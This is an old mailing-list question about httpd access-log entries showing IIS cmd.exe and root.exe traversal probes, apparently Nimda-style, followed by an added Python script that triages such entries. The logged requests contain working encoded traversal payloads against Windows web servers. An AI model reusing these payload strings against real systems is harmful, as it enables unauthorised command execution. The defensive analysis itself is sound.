Subject: httpd access log question
From: Justin Dieters (enderak@yahoo.com)
Date: Wed Jan 16 2002 - 14:29:52 AKST
Hello all. I was browsing through my httpd access logs on my server today
and I noticed several lines that were repeated a few dozen times within the
span of a couple hours, all from the same IP (it looks to be a GCI cable
modem IP). An example of the lines is attached to the end of this message. Other
than these several blocks all together, there are no other instances I can
find. My question is does anyone know what all these accesses might mean?
It looks like it's trying to find some WinNT/2K files, so I'm thinking it
might be a "run-of-the-mill" Nimda attempt or something similar. What do
you all think? Should I be concerned? This was more than a month ago, and I
don't see anything else since then.
Thanks,
Justin
enderak@yahoo.com
--------------------
24.237.72.15 - - [05/Dec/2001:19:22:34 -0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
24.237.72.15 - - [05/Dec/2001:19:22:34 -0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
24.237.72.15 - - [05/Dec/2001:19:22:34 -0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
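
Added example (not part of the original message): one way to triage entries like those above. It percent-decodes each request path until it stops changing, flags multi-layer encoding, the 0xC0/0xC1 bytes that never occur in valid UTF-8, ".." path segments and requests for cmd.exe or root.exe, and counts per client how many flagged requests were answered with a 2xx/3xx status. The sample lines are constructed from the log above (one entry per line) plus one made-up benign request; all function and field names are this example's own.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: four entries from the message, rejoined onto one line
# each, plus one made-up benign request for contrast.
SAMPLE = [
    '24.237.72.15 - - [05/Dec/2001:19:22:34 -0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288',
    '24.237.72.15 - - [05/Dec/2001:19:22:35 -0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310',
    '24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309',
    '24.237.72.15 - - [05/Dec/2001:19:22:36 -0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310',
    '192.0.2.10 - - [05/Dec/2001:19:25:01 -0900] "GET /index.html HTTP/1.0" 200 1043',
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) \S+')
BAD_LEAD = re.compile(rb"[\xc0\xc1]")   # lead bytes that never occur in valid UTF-8
DOTDOT = re.compile(rb"(?:^|/)\.\.")    # a path segment starting with ".."

def decode_layers(path, max_rounds=5):
    """Percent-decode until stable; return (decoded bytes, rounds that changed it)."""
    data, rounds = path.encode("utf-8"), 0
    for _ in range(max_rounds):
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds

def classify(line):
    """Return ip, status and the list of reasons a request looks like a probe."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    decoded, rounds = decode_layers(target.split("?", 1)[0])
    norm = decoded.replace(b"\\", b"/").lower()   # treat '\' like '/'
    checks = [("multi-encoded", rounds > 1),
              ("invalid-utf8", bool(BAD_LEAD.search(decoded))),
              ("traversal", bool(DOTDOT.search(norm))),
              ("shell-binary", norm.endswith((b"/cmd.exe", b"/root.exe")))]
    return {"ip": ip, "status": status, "reasons": [n for n, hit in checks if hit]}

def summarize(lines):
    """Per client: flagged requests, and how many got a 2xx/3xx answer."""
    out = {}
    for hit in filter(None, map(classify, lines)):
        if hit["reasons"]:
            s = out.setdefault(hit["ip"], {"probes": 0, "not_rejected": 0})
            s["probes"] += 1
            s["not_rejected"] += hit["status"][0] in "23"
    return out

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

A non-zero not_rejected count is the figure to look at first, since every entry in the message was answered with a 404.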